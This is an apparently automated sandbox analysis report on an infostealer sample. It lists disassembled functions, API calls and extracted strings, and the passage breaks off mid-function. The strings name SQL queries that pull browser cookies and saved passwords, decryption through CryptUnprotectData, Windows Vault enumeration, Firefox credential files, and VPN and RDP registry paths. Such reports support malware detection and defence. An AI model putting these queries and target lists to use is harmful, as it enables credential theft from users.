API ID: Heap__memcpy$Process$Freelstrlen
String ID: last_visit_time$table$url$urls
API String ID: 2336645791-3896411411
Opcode ID: 293500e957469f0c4013cfb38b400ff077528cbd213c6b76c435456541af9200
Instruction ID: 2173967cddf931a10ef875487a25650b3256bdd195a78922d175093208a1694e
Opcode Fuzzy Hash: 293500e957469f0c4013cfb38b400ff077528cbd213c6b76c435456541af9200
Instruction Fuzzy Hash: A8315166A0A683C6EA60DB26E8405EA6360BB86BC4F444073DE4E87795EF3CE547D704

Function 00007FF6AAB4EEF0 Relevance: 8.8, APIs: 1, Strings: 4, Instructions: 94COMMON

Download Yara Rule

APIs

Part of subcall function 00007FF6AAB425DC: GetProcessHeap.KERNEL32(?,?,?,00007FF6AAB41985,?,?,?,00007FF6AAB4155F), ref: 00007FF6AAB425E5

__memcpy.DELAYIMP ref: 00007FF6AAB4EF77

Part of subcall function 00007FF6AAB50128: __memcpy.DELAYIMP ref: 00007FF6AAB50159
Part of subcall function 00007FF6AAB50128: __memcpy.DELAYIMP ref: 00007FF6AAB50167

Part of subcall function 00007FF6AAB4EBA8: lstrlenA.KERNEL32 ref: 00007FF6AAB4EBC5

Part of subcall function 00007FF6AAB425B4: GetProcessHeap.KERNEL32 ref: 00007FF6AAB425C1
Part of subcall function 00007FF6AAB425B4: RtlFreeHeap.NTDLL ref: 00007FF6AAB425CF

Strings

moz_places, xrefs: 00007FF6AAB4EF40
url, xrefs: 00007FF6AAB4EFC0
table, xrefs: 00007FF6AAB4EF22
last_visit_date, xrefs: 00007FF6AAB4EFD3

Memory Dump Source

Source File: 0000000A.00000002.4143532711.00007FF6AAB41000.00000020.00000001.01000000.00000008.sdmp, Offset: 00007FF6AAB40000, based on PE: true

Associated: 0000000A.00000002.4143377216.00007FF6AAB40000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000A.00000002.4143798817.00007FF6AAB51000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000A.00000002.4143930992.00007FF6AAB54000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000A.00000002.4143979551.00007FF6AAB55000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_7ff6aab40000_BC8F.jbxd

Similarity

API ID: Heap__memcpy$Process$Freelstrlen
String ID: last_visit_date$moz_places$table$url
API String ID: 2336645791-66087218
Opcode ID: 53100e1e7fade05cffaf64fca1c5be8d3b62604d3c00a5c6fca6984d0be0bcad
Instruction ID: 768d66664c9a7d4e8367d6a53ef98378d6c17fa4fd17cbba7571224e0753f283
Opcode Fuzzy Hash: 53100e1e7fade05cffaf64fca1c5be8d3b62604d3c00a5c6fca6984d0be0bcad
Instruction Fuzzy Hash: 68316222A0A743C6EA60DF26E8401BA6750BB86BC4F448173DE4EC7795EE7DE947D700

Function 00007FF6AAB4E3C0 Relevance: 8.8, APIs: 2, Strings: 3, Instructions: 64stringCOMMON

Download Yara Rule

APIs

lstrcpyW.KERNEL32 ref: 00007FF6AAB4E3F0
PathAppendW.SHLWAPI ref: 00007FF6AAB4E3FE

Strings

"},, xrefs: 00007FF6AAB4E4B3
Software\Fortinet\FortiClient\Sslvpn\Tunnels, xrefs: 00007FF6AAB4E3E4
":", xrefs: 00007FF6AAB4E495

Memory Dump Source

Source File: 0000000A.00000002.4143532711.00007FF6AAB41000.00000020.00000001.01000000.00000008.sdmp, Offset: 00007FF6AAB40000, based on PE: true

Associated: 0000000A.00000002.4143377216.00007FF6AAB40000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000A.00000002.4143798817.00007FF6AAB51000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000A.00000002.4143930992.00007FF6AAB54000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000A.00000002.4143979551.00007FF6AAB55000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_7ff6aab40000_BC8F.jbxd

Similarity

API ID: AppendPathlstrcpy
String ID: ":"$"},$Software\Fortinet\FortiClient\Sslvpn\Tunnels
API String ID: 3043196718-4231764533
Opcode ID: 5a0e9e39c7ed851297b8f33945213af4e2244548cb2022a3a818ec5182f3b1dd
Instruction ID: dd8e4f1e5501136bb2d0e58930fa09490476dc538e8c957a60ba0cfa59369e99
Opcode Fuzzy Hash: 5a0e9e39c7ed851297b8f33945213af4e2244548cb2022a3a818ec5182f3b1dd
Instruction Fuzzy Hash: 9F31B471A19B82D2EA20EF62E8041E96361FB89BC0F544173EA5E87799DF3CD546C700

Function 00007FF6AAB41DE8 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 68registryCOMMON

Download Yara Rule

APIs

RegCreateKeyExA.ADVAPI32 ref: 00007FF6AAB41E35
RegSetValueExA.ADVAPI32 ref: 00007FF6AAB41EBE
RegCloseKey.ADVAPI32 ref: 00007FF6AAB41ED1

Strings

?, xrefs: 00007FF6AAB41E29

Memory Dump Source

Source File: 0000000A.00000002.4143532711.00007FF6AAB41000.00000020.00000001.01000000.00000008.sdmp, Offset: 00007FF6AAB40000, based on PE: true

Associated: 0000000A.00000002.4143377216.00007FF6AAB40000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000A.00000002.4143798817.00007FF6AAB51000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000A.00000002.4143930992.00007FF6AAB54000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000A.00000002.4143979551.00007FF6AAB55000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_7ff6aab40000_BC8F.jbxd

Similarity

API ID: CloseCreateValue
String ID: ?
API String ID: 1818849710-1684325040
Opcode ID: 3f4fa53e5a041a1e0e060734a6e5b713b9a361546c9d3b1e30c4574215ea1982
Instruction ID: def37a3bb2af3a1587345149a9e272de0f96a172ed83583931422c93902b811c
Opcode Fuzzy Hash: 3f4fa53e5a041a1e0e060734a6e5b713b9a361546c9d3b1e30c4574215ea1982
Instruction Fuzzy Hash: E921B172A14790CAE7208F71E8402ED7BA4FB89798F544266EA8D43B99DF3CC145CB10

Function 00007FF6AAB4E618 Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 45stringCOMMON

Download Yara Rule

APIs

lstrcpyW.KERNEL32 ref: 00007FF6AAB4E637
PathAppendW.SHLWAPI ref: 00007FF6AAB4E645

Part of subcall function 00007FF6AAB4CD0C: RegGetValueW.ADVAPI32 ref: 00007FF6AAB4CD4B
Part of subcall function 00007FF6AAB4CD0C: RegGetValueW.ADVAPI32 ref: 00007FF6AAB4CD8A

Part of subcall function 00007FF6AAB425B4: GetProcessHeap.KERNEL32 ref: 00007FF6AAB425C1
Part of subcall function 00007FF6AAB425B4: RtlFreeHeap.NTDLL ref: 00007FF6AAB425CF

Strings

Software\SonicWALL\SSL-VPN NetExtender\Standalone\Profiles, xrefs: 00007FF6AAB4E62B
"},, xrefs: 00007FF6AAB4E6C3

Memory Dump Source

Source File: 0000000A.00000002.4143532711.00007FF6AAB41000.00000020.00000001.01000000.00000008.sdmp, Offset: 00007FF6AAB40000, based on PE: true

Associated: 0000000A.00000002.4143377216.00007FF6AAB40000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000A.00000002.4143798817.00007FF6AAB51000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000A.00000002.4143930992.00007FF6AAB54000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000A.00000002.4143979551.00007FF6AAB55000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_7ff6aab40000_BC8F.jbxd

Similarity

API ID: HeapValue$AppendFreePathProcesslstrcpy
String ID: "},$Software\SonicWALL\SSL-VPN NetExtender\Standalone\Profiles
API String ID: 784796242-1893226844
Opcode ID: 6de241257080d24fefd68c1b8e26bb5bf50d8cf1b3b9d4444734eb6179e3eb24
Instruction ID: 0ea0ed94844420ab701b18dc9f12532d0d836425a20e8ac93eb7127d7a3559cd
Opcode Fuzzy Hash: 6de241257080d24fefd68c1b8e26bb5bf50d8cf1b3b9d4444734eb6179e3eb24
Instruction Fuzzy Hash: D6114211A09683D2ED20EB12F8553FA5361EF86BC0F445173EA5E877AADE2CD106C700

Function 00007FF6AAB4CC08 Relevance: 6.1, APIs: 4, Instructions: 61registryCOMMON

Download Yara Rule

APIs

RegOpenKeyExW.ADVAPI32 ref: 00007FF6AAB4CC4D
RegEnumKeyExW.ADVAPI32 ref: 00007FF6AAB4CC87
RegEnumKeyExW.ADVAPI32 ref: 00007FF6AAB4CCD6
RegCloseKey.ADVAPI32 ref: 00007FF6AAB4CCE5

Memory Dump Source

Source File: 0000000A.00000002.4143532711.00007FF6AAB41000.00000020.00000001.01000000.00000008.sdmp, Offset: 00007FF6AAB40000, based on PE: true

Associated: 0000000A.00000002.4143377216.00007FF6AAB40000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000A.00000002.4143798817.00007FF6AAB51000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000A.00000002.4143930992.00007FF6AAB54000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000A.00000002.4143979551.00007FF6AAB55000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_7ff6aab40000_BC8F.jbxd

Similarity

API ID: Enum$CloseOpen
String ID:
API String ID: 1701607978-0
Opcode ID: fcc6f3c639ec119cf7856154b92cbb5a973dd3f81707c5291cfa5e09fa2fda6b
Instruction ID: 80139d5a095dcbe8da99344188368dd28192d7659ef9f5ecf43335eb1c5ccf30
Opcode Fuzzy Hash: fcc6f3c639ec119cf7856154b92cbb5a973dd3f81707c5291cfa5e09fa2fda6b
Instruction Fuzzy Hash: 7F215832618B8582D3108F11E48076AB7B8F789B84F190226EA8D83B28CF3DD55ACB40

Function 00007FF6AAB478EC Relevance: 6.1, APIs: 4, Instructions: 56libraryloaderCOMMON

Download Yara Rule

APIs

LoadLibraryA.KERNEL32 ref: 00007FF6AAB4797A
GetProcAddress.KERNEL32 ref: 00007FF6AAB47986
GetCurrentProcess.KERNEL32 ref: 00007FF6AAB47995
IsWow64Process.KERNEL32 ref: 00007FF6AAB479A3

Memory Dump Source

Source File: 0000000A.00000002.4143532711.00007FF6AAB41000.00000020.00000001.01000000.00000008.sdmp, Offset: 00007FF6AAB40000, based on PE: true

Associated: 0000000A.00000002.4143377216.00007FF6AAB40000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000A.00000002.4143798817.00007FF6AAB51000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000A.00000002.4143930992.00007FF6AAB54000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000A.00000002.4143979551.00007FF6AAB55000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_7ff6aab40000_BC8F.jbxd

Similarity

API ID: Process$AddressCurrentLibraryLoadProcWow64
String ID:
API String ID: 4035193891-0
Opcode ID: cdaa70f4b17d9021ac9a311444477d27912caa0ffaeae6d3bd1739126b036b9d
Instruction ID: 3dfe935276b82b8027dcd6f1956aa974149b74550ffe3228e8fc78ff57f606ff
Opcode Fuzzy Hash: cdaa70f4b17d9021ac9a311444477d27912caa0ffaeae6d3bd1739126b036b9d
Instruction Fuzzy Hash: EB21A562E1E7C2C7EF519F61A4052BAA790FB5A7C0F045276DACE82B56DF6CC145CB00

Function 00007FF6AAB4E4E8 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 65stringCOMMON

Download Yara Rule

APIs

lstrcpyW.KERNEL32 ref: 00007FF6AAB4E514
PathAppendW.SHLWAPI ref: 00007FF6AAB4E522

Part of subcall function 00007FF6AAB4CD0C: RegGetValueW.ADVAPI32 ref: 00007FF6AAB4CD4B
Part of subcall function 00007FF6AAB4CD0C: RegGetValueW.ADVAPI32 ref: 00007FF6AAB4CD8A

Strings

Software\Microsoft\Terminal Server Client\Servers, xrefs: 00007FF6AAB4E508

Memory Dump Source

Source File: 0000000A.00000002.4143532711.00007FF6AAB41000.00000020.00000001.01000000.00000008.sdmp, Offset: 00007FF6AAB40000, based on PE: true

Associated: 0000000A.00000002.4143377216.00007FF6AAB40000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000A.00000002.4143798817.00007FF6AAB51000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000A.00000002.4143930992.00007FF6AAB54000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000A.00000002.4143979551.00007FF6AAB55000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_7ff6aab40000_BC8F.jbxd

Similarity

API ID: Value$AppendPathlstrcpy
String ID: Software\Microsoft\Terminal Server Client\Servers
API String ID: 19203174-1233151749
Opcode ID: dc912856a7e27050b6cdfcd3a7191b37f348cc033d8102c7e34ab7055c14a043
Instruction ID: 6a81a0cd67743ee12eee0161fd959a6bc7a1aed578c83aeacc7ad1980e7e1a30
Opcode Fuzzy Hash: dc912856a7e27050b6cdfcd3a7191b37f348cc033d8102c7e34ab7055c14a043
Instruction Fuzzy Hash: C821C371615A82D6DB20EF62E8142FD6361FB85BC4F444173EA5E8B79ADE3CD206C700

Function 00007FF6AAB4FDF4 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 43stringCOMMON

Download Yara Rule

APIs

GetEnvironmentVariableW.KERNEL32 ref: 00007FF6AAB4FE25
lstrcatW.KERNEL32 ref: 00007FF6AAB4FE32

Part of subcall function 00007FF6AAB4FF50: lstrlenW.KERNEL32 ref: 00007FF6AAB4FF76
Part of subcall function 00007FF6AAB4FF50: lstrlenW.KERNEL32 ref: 00007FF6AAB4FF92
Part of subcall function 00007FF6AAB4FF50: WideCharToMultiByte.KERNEL32 ref: 00007FF6AAB4FFBB
Part of subcall function 00007FF6AAB4FF50: PathFileExistsA.SHLWAPI ref: 00007FF6AAB4FFC4
Part of subcall function 00007FF6AAB4FF50: OpenFile.KERNEL32 ref: 00007FF6AAB4FFDD
Part of subcall function 00007FF6AAB4FF50: GetFileSize.KERNEL32 ref: 00007FF6AAB4FFFD
Part of subcall function 00007FF6AAB4FF50: CreateFileMappingA.KERNEL32 ref: 00007FF6AAB50034
Part of subcall function 00007FF6AAB4FF50: MapViewOfFile.KERNEL32 ref: 00007FF6AAB50055
Part of subcall function 00007FF6AAB4FF50: __memcpy.DELAYIMP ref: 00007FF6AAB50067
Part of subcall function 00007FF6AAB4FF50: UnmapViewOfFile.KERNEL32 ref: 00007FF6AAB50072
Part of subcall function 00007FF6AAB4FF50: CloseHandle.KERNEL32 ref: 00007FF6AAB5007B
Part of subcall function 00007FF6AAB4FF50: CloseHandle.KERNEL32 ref: 00007FF6AAB50084

Part of subcall function 00007FF6AAB4F294: __memcpy.DELAYIMP ref: 00007FF6AAB4F2B2

Part of subcall function 00007FF6AAB425B4: GetProcessHeap.KERNEL32 ref: 00007FF6AAB425C1
Part of subcall function 00007FF6AAB425B4: RtlFreeHeap.NTDLL ref: 00007FF6AAB425CF

Strings

APPDATA, xrefs: 00007FF6AAB4FE1E

Memory Dump Source

Source File: 0000000A.00000002.4143532711.00007FF6AAB41000.00000020.00000001.01000000.00000008.sdmp, Offset: 00007FF6AAB40000, based on PE: true

Associated: 0000000A.00000002.4143377216.00007FF6AAB40000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000A.00000002.4143798817.00007FF6AAB51000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000A.00000002.4143930992.00007FF6AAB54000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000A.00000002.4143979551.00007FF6AAB55000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_7ff6aab40000_BC8F.jbxd

Similarity

API ID: File$CloseHandleHeapView__memcpylstrlen$ByteCharCreateEnvironmentExistsFreeMappingMultiOpenPathProcessSizeUnmapVariableWidelstrcat
String ID: APPDATA
API String ID: 2395011915-4054820676
Opcode ID: 87c3b692c552a36e5dcac7bbf7354c32fc86ccac0c10c444158e78578eef65e3
Instruction ID: fc10c5e0a0b71242c603ffed331b6a4cf3b5e327f0953da9bd2798463fff3e26
Opcode Fuzzy Hash: 87c3b692c552a36e5dcac7bbf7354c32fc86ccac0c10c444158e78578eef65e3
Instruction Fuzzy Hash: 46112132729A82D2EB10DB25E4545EE7371FB85B84F845073EA4E87A59EF3CD50AC740

Analysis Process: explorer.exePID: 6072, Parent PID: 2580COMMON

Execution Graph

Execution Coverage:	4%
Dynamic/Decrypted Code Coverage:	50.2%
Signature Coverage:	3.1%
Total number of Nodes:	802
Total number of Limit Nodes:	77

Executed Functions

Function 00E03717 Relevance: 45.9, APIs: 19, Strings: 7, Instructions: 401
stringfileencryptionCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

Part of subcall function 00E01B6A: CreateFileW.KERNELBASE(00000000,00000080,00000000,00000000,00000003,00000000,00000000,00000000,00E02893,00000000,00000000,00000000,?), ref: 00E01B82
Part of subcall function 00E01B6A: CloseHandle.KERNELBASE(00000000), ref: 00E01B8F

GetTempPathW.KERNEL32(00000104,00000000), ref: 00E03778
GetTempFileNameW.KERNELBASE(00000000,00000000,00000000,00000000), ref: 00E03782
DeleteFileW.KERNELBASE(00000000), ref: 00E03789
CopyFileW.KERNELBASE(?,00000000,00000000), ref: 00E03794
RtlCompareMemory.NTDLL(00000000,?,00000003), ref: 00E0383B
RtlZeroMemory.NTDLL(?,00000040), ref: 00E03870
lstrlen.KERNEL32(?,?,?,?,?), ref: 00E0398B
lstrlen.KERNEL32(00000000), ref: 00E0399A
wsprintfA.USER32 ref: 00E039F1
lstrlen.KERNEL32(00000000,?,?), ref: 00E039FD
lstrcat.KERNEL32(00000000,?), ref: 00E03A21
CryptUnprotectData.CRYPT32(?,00000000,00000000,00000000,00000000,00000001,?), ref: 00E03A49
lstrlen.KERNEL32(?,00000000,00000000,00000000,00000000), ref: 00E03B13
lstrlen.KERNEL32(00000000), ref: 00E03B22
wsprintfA.USER32 ref: 00E03B79
lstrlen.KERNEL32(00000000), ref: 00E03B85
lstrcat.KERNEL32(00000000,?), ref: 00E03BA9
lstrlen.KERNEL32(00000000,?,?,?,00000000,00000000,?), ref: 00E03BDA
DeleteFileW.KERNELBASE(00000000,00000000,?), ref: 00E03C16

Strings

0, xrefs: 00E03828
%sTRUE%s%s%s%s%s, xrefs: 00E039EB, 00E03B73
SELECT host_key,path,is_secure,name,encrypted_value FROM cookies, xrefs: 00E037C3
COOKIES, xrefs: 00E03BE8, 00E03BED, 00E03BF6
FALSE, xrefs: 00E039BC, 00E03B3C
TRUE, xrefs: 00E039C9, 00E03B51
v1, xrefs: 00E03821

Memory Dump Source

Source File: 0000000D.00000002.2907845320.0000000000E01000.00000040.80000000.00040000.00000000.sdmp, Offset: 00E01000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_13_2_e01000_explorer.jbxd

Similarity

API ID: lstrlen$File$DeleteMemoryTemplstrcatwsprintf$CloseCompareCopyCreateCryptDataHandleNamePathUnprotectZero
String ID: %sTRUE%s%s%s%s%s$0$COOKIES$FALSE$SELECT host_key,path,is_secure,name,encrypted_value FROM cookies$TRUE$v1
API String ID: 584740257-404540950
Opcode ID: 078be1d4740e2c13140fb6c8c6879adb74d550a0e78f40cba97e28b632ca7038
Instruction ID: 70d0204c2b64da56b3ffabedae1c7e040bb7d5c328dac8558bb2456a90662149
Opcode Fuzzy Hash: 078be1d4740e2c13140fb6c8c6879adb74d550a0e78f40cba97e28b632ca7038
Instruction Fuzzy Hash: CEE1A970208341AFD725DF65C880A2FBBE9AFC4349F44592CF985AB291DB75CD88CB52

Function 00E02198 Relevance: 33.5, APIs: 12, Strings: 7, Instructions: 242
libraryloaderCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

RtlZeroMemory.NTDLL(?,00000114), ref: 00E021AF
GetVersionExW.KERNEL32(?), ref: 00E021BE
LoadLibraryW.KERNELBASE(vaultcli.dll), ref: 00E021E8
GetProcAddress.KERNEL32(00000000,VaultOpenVault), ref: 00E0220A
GetProcAddress.KERNEL32(00000000,VaultCloseVault), ref: 00E02214
GetProcAddress.KERNEL32(00000000,VaultEnumerateItems), ref: 00E02220
GetProcAddress.KERNEL32(00000000,VaultGetItem), ref: 00E0222A
GetProcAddress.KERNEL32(00000000,VaultFree), ref: 00E02236
RtlCompareMemory.NTDLL(?,00E61110,00000010), ref: 00E022E8
RtlCompareMemory.NTDLL(?,00E61110,00000010), ref: 00E0236C

Part of subcall function 00E01953: lstrlenW.KERNEL32(?,00000000,00000000,?,?,00E02F0C), ref: 00E01973
Part of subcall function 00E01953: lstrlenW.KERNEL32(00E56564,?,?,00E02F0C), ref: 00E01978
Part of subcall function 00E01953: lstrcatW.KERNEL32(00000000,?,?,?,00E02F0C), ref: 00E01990
Part of subcall function 00E01953: lstrcatW.KERNEL32(00000000,00E56564,?,?,00E02F0C), ref: 00E01994

StrStrIW.SHLWAPI(?,Internet Explorer), ref: 00E023FE
FreeLibrary.KERNELBASE(00000000), ref: 00E02493

Strings

vaultcli.dll, xrefs: 00E021E3
VaultCloseVault, xrefs: 00E0220C
Internet Explorer, xrefs: 00E023F8
VaultOpenVault, xrefs: 00E02204
VaultEnumerateItems, xrefs: 00E02216
VaultFree, xrefs: 00E0222C
VaultGetItem, xrefs: 00E02222

Memory Dump Source

Source File: 0000000D.00000002.2907845320.0000000000E01000.00000040.80000000.00040000.00000000.sdmp, Offset: 00E01000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_13_2_e01000_explorer.jbxd

Similarity

API ID: AddressProc$Memory$CompareLibrarylstrcatlstrlen$FreeLoadVersionZero
String ID: Internet Explorer$VaultCloseVault$VaultEnumerateItems$VaultFree$VaultGetItem$VaultOpenVault$vaultcli.dll
API String ID: 2583887280-2831467701
Opcode ID: d3f67fcc712dbd1fb929e38760b290e6377181451d6daf7156f995cb6e2bebcf
Instruction ID: cca095203c6abde567d9e4e5e5bdc11d4a3c6602f228f8dee4f46ab9ef349a78
Opcode Fuzzy Hash: d3f67fcc712dbd1fb929e38760b290e6377181451d6daf7156f995cb6e2bebcf
Instruction Fuzzy Hash: 8791AF71A083019FD718DF61C888A2FBBE5BFD8748F40582DFA95A7291DB70D885CB42

Function 00E03098 Relevance: 21.2, APIs: 8, Strings: 4, Instructions: 248
fileencryptionCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

Part of subcall function 00E01B6A: CreateFileW.KERNELBASE(00000000,00000080,00000000,00000000,00000003,00000000,00000000,00000000,00E02893,00000000,00000000,00000000,?), ref: 00E01B82
Part of subcall function 00E01B6A: CloseHandle.KERNELBASE(00000000), ref: 00E01B8F

GetTempPathW.KERNEL32(00000104,00000000), ref: 00E030F9
GetTempFileNameW.KERNELBASE(00000000,00000000,00000000,00000000), ref: 00E03103
DeleteFileW.KERNELBASE(00000000), ref: 00E0310A
CopyFileW.KERNELBASE(?,00000000,00000000), ref: 00E03115
RtlCompareMemory.NTDLL(00000000,00000000,00000003), ref: 00E031A4
RtlZeroMemory.NTDLL(?,00000040), ref: 00E031D7
CryptUnprotectData.CRYPT32(?,00000000,00000000,00000000,00000000,00000001,?), ref: 00E032DF
DeleteFileW.KERNELBASE(00000000,00000000,?), ref: 00E0339C

Strings

@, xrefs: 00E031F1
SELECT origin_url,username_value,password_value FROM logins, xrefs: 00E03136
v1, xrefs: 00E0318A
0, xrefs: 00E03191

Memory Dump Source

Source File: 0000000D.00000002.2907845320.0000000000E01000.00000040.80000000.00040000.00000000.sdmp, Offset: 00E01000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_13_2_e01000_explorer.jbxd

Similarity

API ID: File$DeleteMemoryTemp$CloseCompareCopyCreateCryptDataHandleNamePathUnprotectZero
String ID: 0$@$SELECT origin_url,username_value,password_value FROM logins$v1
API String ID: 2757140130-4052020286
Opcode ID: 59ac720a3b7826b659308effb772f5863e618dfe159bf14b6dcdf19e2e1a6af7
Instruction ID: c9d402778daedb4cae8846179da38a2360434af3ad532030c3f54b599ac3ce29
Opcode Fuzzy Hash: 59ac720a3b7826b659308effb772f5863e618dfe159bf14b6dcdf19e2e1a6af7
Instruction Fuzzy Hash: E791A971208341AFD7109F25C884A2FBBEDAFC5748F04592DF985A72A1DB34DE88CB12

Function 00E03ED9 Relevance: 19.3, APIs: 9, Strings: 2, Instructions: 82
stringfileCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

Part of subcall function 00E01000: GetProcessHeap.KERNEL32(00000008,?,00E011C7,?,?,00000001,00000000,?), ref: 00E01003
Part of subcall function 00E01000: RtlAllocateHeap.NTDLL(00000000), ref: 00E0100A

PathCombineW.SHLWAPI(00000000,00000000,*.*,?,00000000), ref: 00E03F0A
FindFirstFileW.KERNELBASE(00000000,?,?,00000000), ref: 00E03F16
lstrcmpiW.KERNEL32(?,00E562CC), ref: 00E03F38
lstrcmpiW.KERNEL32(?,00E562D0), ref: 00E03F4C
PathCombineW.SHLWAPI(00000000,00000000,?), ref: 00E03F69
lstrcmpiW.KERNEL32(?,Local State), ref: 00E03F7E
PathCombineW.SHLWAPI(00000000,00000000,?), ref: 00E03F9B
FindNextFileW.KERNELBASE(00000000,00000010), ref: 00E03FB5
FindClose.KERNELBASE(00000000), ref: 00E03FC4

Strings

Local State, xrefs: 00E03F78
*.*, xrefs: 00E03F01

Memory Dump Source

Source File: 0000000D.00000002.2907845320.0000000000E01000.00000040.80000000.00040000.00000000.sdmp, Offset: 00E01000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_13_2_e01000_explorer.jbxd

Similarity

API ID: CombineFindPathlstrcmpi$FileHeap$AllocateCloseFirstNextProcess
String ID: *.*$Local State
API String ID: 3923353463-3324723383
Opcode ID: d763306538bee720cbf6f5ee85636fe27a911d3b655d82e975f38db9e0938bf3
Instruction ID: 00ae2a1e6bc984132f3a77c9da1c017dccebb480dfbdebf833a5d5b3c7f5e747
Opcode Fuzzy Hash: d763306538bee720cbf6f5ee85636fe27a911d3b655d82e975f38db9e0938bf3
Instruction Fuzzy Hash: 9821D0303007056FD724BB718C08ABB76BC9B81346F842929F952F71E2EB78898C8661

Function 00E02B15 Relevance: 17.6, APIs: 7, Strings: 3, Instructions: 102
filestringCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

Part of subcall function 00E01953: lstrlenW.KERNEL32(?,00000000,00000000,?,?,00E02F0C), ref: 00E01973
Part of subcall function 00E01953: lstrlenW.KERNEL32(00E56564,?,?,00E02F0C), ref: 00E01978
Part of subcall function 00E01953: lstrcatW.KERNEL32(00000000,?,?,?,00E02F0C), ref: 00E01990
Part of subcall function 00E01953: lstrcatW.KERNEL32(00000000,00E56564,?,?,00E02F0C), ref: 00E01994

FindFirstFileW.KERNELBASE(00000000,?,00000000,00000000,?,00000000), ref: 00E02B3D
lstrcmpiW.KERNEL32(?,00E562CC), ref: 00E02B63
lstrcmpiW.KERNEL32(?,00E562D0), ref: 00E02B7B

Part of subcall function 00E019B4: lstrlenW.KERNEL32(00000000,00000000,00000000,00E02CAF,00000000,00000000,?,?,00000000,PathToExe,00000000,00000000), ref: 00E019C4

StrStrIW.SHLWAPI(00000000,logins.json), ref: 00E02BE7
StrStrIW.SHLWAPI(00000000,cookies.sqlite), ref: 00E02C16
FindNextFileW.KERNELBASE(00000000,00000010), ref: 00E02C43
FindClose.KERNELBASE(00000000), ref: 00E02C52

Strings

cookies.sqlite, xrefs: 00E02C10
\*.*, xrefs: 00E02B15
logins.json, xrefs: 00E02BE1

Memory Dump Source

Source File: 0000000D.00000002.2907845320.0000000000E01000.00000040.80000000.00040000.00000000.sdmp, Offset: 00E01000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_13_2_e01000_explorer.jbxd

Similarity

API ID: Findlstrlen$Filelstrcatlstrcmpi$CloseFirstNext
String ID: \*.*$cookies.sqlite$logins.json
API String ID: 1108783765-3717368146
Opcode ID: 25da3f4166c9b78c65012149a15666a863ea92baa61e5ea1e6703c28d9a0e610
Instruction ID: 5b68d2055e4e24be3ac98038fc82cd06ce522e06efed5caf6044a9bc94548e34
Opcode Fuzzy Hash: 25da3f4166c9b78c65012149a15666a863ea92baa61e5ea1e6703c28d9a0e610
Instruction Fuzzy Hash: 2131B2303043014BDB18AB318899A3E73DAABC4305F846D2CBA46F72C2EB78CD899651

Function 00E01D4A Relevance: 14.1, APIs: 6, Strings: 2, Instructions: 109
stringfileCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

Part of subcall function 00E019B4: lstrlenW.KERNEL32(00000000,00000000,00000000,00E02CAF,00000000,00000000,?,?,00000000,PathToExe,00000000,00000000), ref: 00E019C4

FindFirstFileW.KERNELBASE(00000000,?,?,00000000), ref: 00E01DA9
lstrcmpiW.KERNEL32(?,00E562CC), ref: 00E01DCF
lstrcmpiW.KERNEL32(?,00E562D0), ref: 00E01DE7
lstrcmpiW.KERNEL32(?,?), ref: 00E01E62

Part of subcall function 00E01CF7: lstrlenW.KERNEL32(00000000,00000000,00000000,00E02C27), ref: 00E01D02
Part of subcall function 00E01CF7: RtlComputeCrc32.NTDLL(00000000,00000000,00000000), ref: 00E01D0D

FindNextFileW.KERNELBASE(00000000,00000010), ref: 00E01E94
